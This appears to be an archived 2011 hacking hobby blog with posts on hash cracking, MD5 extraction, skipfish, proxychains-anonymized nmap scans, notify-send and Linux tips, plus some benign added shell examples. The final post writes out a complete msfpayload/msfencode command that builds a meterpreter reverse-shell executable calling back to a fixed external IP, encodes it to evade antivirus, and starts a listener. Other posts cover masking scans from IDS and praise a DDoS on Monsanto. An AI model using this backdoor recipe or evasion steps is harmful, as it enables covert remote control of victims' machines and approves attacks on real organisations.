
Monday, June 27, 2011

Basic PHP Hash Cracker

Well, I moved from Java to C++ until I got more interested in web security... which led me to stray away from C++ and learn some web dev. Right now I'm learning PHP, and in the process I made this simple hash cracker. Below you can find the source and a very basic dictionary (approx. 19 MB) for testing purposes. You can check out the working version hosted here; if I make any updates to it (such as supplying a hash list instead of a single hash) then I'll update this page or make a new post.
 
Source
Example
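The post's PHP source is linked rather than shown, so here is the same dictionary check written against coreutils as an added example (it is not the post's code). It shows the point the cracker illustrates: an unsalted MD5 of a common word is recovered in a single pass over a word list, which is why stored passwords should use a salted, deliberately slow hash instead. The four-word list in `sample_wordlist` is constructed for the demo and stands in for the post's 19 MB dictionary.

```shell
#!/bin/sh
# Added example, not the post's PHP source: a dictionary lookup for an
# unsalted MD5, done with md5sum.

# md5_lookup HEX_HASH WORDLIST: print the word whose MD5 equals HEX_HASH and
# return 0; print nothing and return 1 if no word in the list matches.
md5_lookup() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')   # compare case-insensitively
    wordlist=$2
    while IFS= read -r word || [ -n "$word" ]; do   # also handles a missing final newline
        # printf '%s' so the trailing newline is not hashed along with the word
        h=$(printf '%s' "$word" | md5sum | cut -d' ' -f1)
        if [ "$h" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Constructed four-word list standing in for a real dictionary; prints the
# path of the temporary file it wrote.
sample_wordlist() {
    f=$(mktemp)
    printf '%s\n' 123456 letmein password qwerty > "$f"
    printf '%s\n' "$f"
}

# Usage: md5_lookup 5f4dcc3b5aa765d61d8327deb882cf99 "$(sample_wordlist)"
# prints "password"
```

The lookup hashes every candidate, so it scales linearly with the word list; a precomputed table of hash to word is the obvious speed-up, and salting is exactly what makes such tables useless against a stored hash.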

Tuesday, June 21, 2011

Java MD5 parser

Well, I don't code in Java much anymore, but I encountered a task which involved isolating MD5 hashes from a rather large text file, which would have been a pain in the ass to do manually. I also tried awk, grep and sed a bit. They all worked to a lesser degree, but not quite what I was looking for. So I remembered the Java IP parser I coded for parsing nmap logs and pulling the IPs, and just altered the regex to pull MD5s instead of IPs and write them to a file. Because I found it rather helpful, I decided to make a quick post and link the new source and jar file.

I think sed could have actually done the job but I wasn't having any luck and this alternative was extremely easy and quick. Plus it does exactly what I needed.


Usage:

java -jar md5.jar filename.txt
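For comparison, the same extraction done with grep and awk, as an added example rather than the post's jar. One reason a plain grep for 32 hex characters is "not quite" right is that it also matches the first 32 characters of any longer hash (SHA-1 is 40, SHA-256 is 64), so this version takes maximal runs of hex characters and keeps only those of exactly 32 characters before lower-casing and de-duplicating. The input file written by `sample_input` is constructed for the demo.

```shell
#!/bin/sh
# Added example, not the post's Java parser: extract MD5 hashes from a text
# file with grep and awk.

# extract_md5 FILE: print each distinct MD5 found in FILE, one per line.
# Maximal hex runs are taken first so a 40- or 64-character hash is not
# truncated into a false 32-character "MD5".
extract_md5() {
    grep -oiE '[0-9a-f]+' "$1" \
        | awk 'length($0) == 32 { print tolower($0) }' \
        | sort -u
}

# Constructed input for trying it out; prints the path of the temp file.
# Contains two distinct MD5s (one repeated, one upper-case), a 40-character
# SHA-1-length value that must be ignored, and a short hex word.
sample_input() {
    f=$(mktemp)
    printf '%s\n' \
        'admin:5f4dcc3b5aa765d61d8327deb882cf99' \
        'sha1, 40 chars, must be ignored: 2fd4e1c67a2d28fced849ee1bb76e7391b93eb12' \
        'USER2:5D41402ABC4B2A76B9719D911017C592' \
        'repeated 5f4dcc3b5aa765d61d8327deb882cf99 again' \
        'not a hash: deadbeef' > "$f"
    printf '%s\n' "$f"
}

# Usage: extract_md5 "$(sample_input)" > hashes.txt
```

A hash glued directly to a hex-looking letter (for example `e5f4dcc…`) would come out as a 33-character run and be dropped; that is the trade-off for not truncating longer hashes, and it is easy to relax by also accepting runs that begin or end at a non-hex character if your input needs it.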

Saturday, June 18, 2011

Adding fluxbox styles.

I've had a few people ask me how to change their fluxbox theme, so I've decided to make a quick how-to on adding styles, which is very easy.

First off, know that your fluxbox styles are stored in "/usr/share/fluxbox/styles".

So all you have to do is download your style of choice and extract it into that styles folder. The new style should now be listed in the fluxbox settings.

Bam, you're done.

Compiling skipfish and fixing errors.

Well, this is the second time I'm writing this... so this one will be a bit more brief. I encountered some issues when installing the latest version of skipfish on my desktop, one involving "idna.h" and the other a whole plethora of SSL-related issues. With some googling I solved them, so I've decided to make a quick post to help others who want to install this tool or have encountered the same errors as I had.

Both issues can be solved by installing the following packages (libidn11-dev provides idna.h, libssl-dev the OpenSSL headers), but we will want to update the package lists first of course.

sudo apt-get update
sudo apt-get install libssl-dev libidn11-dev

Now we download the source, for those who have just come across this and need to compile it, or whatever the case may be.

wget http://skipfish.googlecode.com/files/skipfish-1.94b.tgz
tar -xvzf skipfish-1.94b.tgz
cd ./skipfish-1.94b
make

Now you should have successfully compiled yourself a working skipfish binary, which can be used like so:

./skipfish -h

Friday, June 17, 2011

Find a file and its directory in linux

Okay, this is a quick tip which a lot of you guys probably know, but I forgot about it until just now. I always find myself in a situation where I need to find a file's location but can't seem to locate it, at which point I resort to google. But a quicker and easier way to do this is the "whereis" command.

~ $ whereis conky
conky: /usr/bin/conky /etc/conky /usr/lib/conky /usr/share/man/man1/conky.1.gz

Alternatively you could use the find command.

~ # find / -iname conky
/etc/conky
/usr/bin/conky
/usr/share/doc/conky
/usr/lib/conky

Monday, June 13, 2011

Anonymous nmap scans

This is an extremely simple tutorial on how you can use "proxychains" to anonymize your nmap scans, or to trip the IDS/firewalls with multiple IPs to mask which one you really are. First, proceed to the following link to download the proxychains package.

http://prdownloads.sourceforge.net/proxychains/proxychains-3.1.tar.gz?download

Now we need to extract its contents with the "tar" command so that we can configure it and compile it.

~ $ tar -xvzf proxychains-3.1.tar.gz

That will extract it into the current directory; now we will "cd" into that directory, configure it, then compile it.

cd ./proxychains-3.1
./configure
make install

Now you'll have proxychains configured for your system and a compiled binary. Before you can use it you must configure it, unless you're using tor, which is its default setting - socks5 127.0.0.1 9050.

nano proxychains.conf

At this point you will want to scroll down to the bottom of the file, which is where you configure which proxies to use and what type they are. You can find proxies at one of the following links at the bottom of this site.

For example, the default should look like this:
#        Examples:
#
#               socks5  192.168.67.78   1080    lamer   secret
#               http    192.168.89.3    8080    justu   hidden
#               socks4  192.168.1.49    1080
#               http    192.168.39.93   8080
#
#
#       proxy types: http, socks4, socks5
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050

So, if you're using tor then you can just leave it, or add more proxies to the chain. Say I wanted to add an http proxy to the chain; I would edit the config file like so.

#        Examples:
#
#               socks5  192.168.67.78   1080    lamer   secret
#               http    192.168.89.3    8080    justu   hidden
#               socks4  192.168.1.49    1080
#               http    192.168.39.93   8080
#
#
#       proxy types: http, socks4, socks5
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050
http 189.47.194.196 8080

Now you're ready to use it. You can run a tool through proxychains like this:

./proxychains nmap 199.66.1.11

And that about wraps it up for this quick how-to on anonymizing nmap scans.

Sunday, June 12, 2011

Anonymous targets Monsanto

Well, it looks like Monsanto was recently in anon's scope, being hit with a DDoS that was said to have lasted over 60 hours. There were also vulnerabilities found, such as SQLi on their foreign sites, though their focus seemed to have been on DoSing monsanto.com.

As I write this, their site still remains down due to the DoS anon was so nice as to supply. It seems even anon realizes Monsanto is a terrible corporation whose main goal is complete control of the food supply. As Henry Kissinger once said, "If you control the oil you control the country; if you control food, you control the people."

I really hope the population wakes up and gets a grip on reality, rather than this material illusion the general public succumbs to.

I'm glad the hacking community takes notice of Monsanto and their dirty ways, rather than cracking a tin foil hat joke while stuffing their faces with genetically modified chips covered in MSG and watching television.

Saturday, June 4, 2011

Notify-Send - On Screen text display

To start off, install the following package from your repositories:

apt-get install libnotify-bin

After that you can test it like so:

notify-send "Resist Monsanto"

That will create a popup on your screen displaying the text you entered.

Now if you were to enter a command within the quotes, or even without, it would simply be displayed as text. The way to tell notify-send to display the output of a command is to wrap the command in backticks (` `). For example:

notify-send "` w `"

Though that's a bit jumbled up on this netbook, so I'm going to pipe it to awk to shorten it a bit and just display what I want to see.

notify-send "` w | awk '{print $1 " -> " $8}'`"

So now that will show me who's logged onto this system and what they're currently doing. I could automate this with a while loop in order to have the notification displayed to me every however many minutes I choose. For example:

while [ 1 ]; do notify-send "` w | awk '{print $1 " -> " $8}'`"; sleep 10; done

That would create a pop-up every 10 seconds showing me who's logged on and what they're currently doing. If we wanted something a bit longer than a few seconds then you can add an "m" to the sleep command we issued to make it 10 minutes instead.

while [ 1 ]; do notify-send "` w | awk '{print $1 " -> " $8}'`"; sleep 10m; done

You can also alter the amount of time the popup is displayed by specifying, in milliseconds, how long it should stay on screen before expiring; 5000 keeps it up for five seconds.

notify-send -t 5000 "` w | awk '{print $1 " -> " $8}'`"

Another feature of notify-send is the ability to display an icon and a title. This is demonstrated below:

notify-send "Monsanto" "Genetically Modifying People Near YOU" -i /usr/share/pixmaps/terminator.xpm -t 5000

You may not have that icon if you don't have the terminal emulator "terminator", in which case I highly suggest giving it a try. It's by far my favorite terminal.

Now that just about covers this brief "how-to" on notify-send, and as you can see there's quite a few things this tool can be used for. I'm sure you'll think of plenty of your own ideas. Feel free to share the things you use notify-send for, and maybe share your own scripts and ideas.
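As an added example building on the `w | awk` loop above (this is not code from the original post), here is a small login monitor that only raises a notification when a session appears that was not present at the previous check, rather than popping up every ten seconds regardless. It assumes `w -h` prints one session per line with the columns USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT (the layout the post's awk takes $1 and $8 from), and it falls back to printing on the terminal when notify-send is not installed. The two `w` snapshots at the bottom are constructed for testing without a live system.

```shell
#!/bin/sh
# Added example, not from the original post: notify only on newly appeared
# login sessions, built on the post's `w | awk` idea.
export LC_ALL=C   # so sort and comm agree on ordering

# session_set: read `w -h` lines on stdin, print one sorted "user@tty" per line.
session_set() {
    awk '{ print $1 "@" $2 }' | sort -u
}

# new_sessions OLD NEW: print the tokens present in NEW but absent from OLD.
# Both arguments are newline-separated lists as produced by session_set.
new_sessions() {
    old=$(mktemp); new=$(mktemp)
    printf '%s\n' "$1" | sort -u > "$old"
    printf '%s\n' "$2" | sort -u > "$new"
    comm -13 "$old" "$new"      # lines only in the second file
    rm -f "$old" "$new"
}

# notify TITLE BODY: use notify-send when available, else print to the terminal.
notify() {
    if command -v notify-send >/dev/null 2>&1; then
        notify-send -t 5000 "$1" "$2"
    else
        printf '%s: %s\n' "$1" "$2"
    fi
}

# monitor_logins [SECONDS]: poll `w` and notify only on sessions that are new
# since the previous poll (default every 10 seconds).
monitor_logins() {
    prev=""
    while :; do
        cur=$(w -h | session_set)
        added=$(new_sessions "$prev" "$cur")
        [ -n "$added" ] && notify "New login" "$added"
        prev=$cur
        sleep "${1:-10}"
    done
}

# Constructed `w -h` snapshots (hypothetical users and addresses) for testing.
SAMPLE_W_BEFORE='alice    pts/0    10.0.0.5     09:12    1.00s  0.05s  0.01s w
bob      pts/1    10.0.0.9     09:30    3.00s  0.02s  0.00s bash'
SAMPLE_W_AFTER="$SAMPLE_W_BEFORE
mallory  pts/2    10.0.0.77    09:41    0.00s  0.01s  0.00s sh"

# Usage: monitor_logins 10 &
```

Keying on user@tty rather than the WHAT column means a user switching commands does not re-trigger the notification, while a second session from the same user on another tty does; swap in `w -h -i` or `who` if you prefer the FROM address in the token.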

Bypassing Anti-Virus with msfencode.

Well, I recently posted about msfpayload and how to generate a backdoored exe with it. What I left out was msfencode, which is extremely useful because the "unpacked" executable is very likely to be detected by most anti-virus. You can find my previous post here.

Now let's take what we learned from the last post and pipe the msfpayload output to msfencode.

~ $ msfpayload windows/meterpreter/reverse_tcp LHOST=19.84.20.11 LPORT=3030 R | msfencode -e x86/shikata_ga_nai -t exe -c 5 -o FuckMonsanto.exe

This pipes the payload into msfencode to be passed through the encoder 5 times (-c specifies the number of encoding passes), using the polymorphic XOR encoder "shikata ga nai", and outputs the backdoor as "FuckMonsanto.exe".

You can fire up the handler in metasploit the same way as before, but I would like to add that you can run things as a "job" that runs in the background by using the "-j" option.

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 19.84.20.11
msf exploit(handler) > set LPORT 3030
msf exploit(handler) > exploit -j

Now you can continue with your pentest while the handler runs in the background and waits for connections, at which point you can use the "jobs" command to see and interact with the jobs running in the background.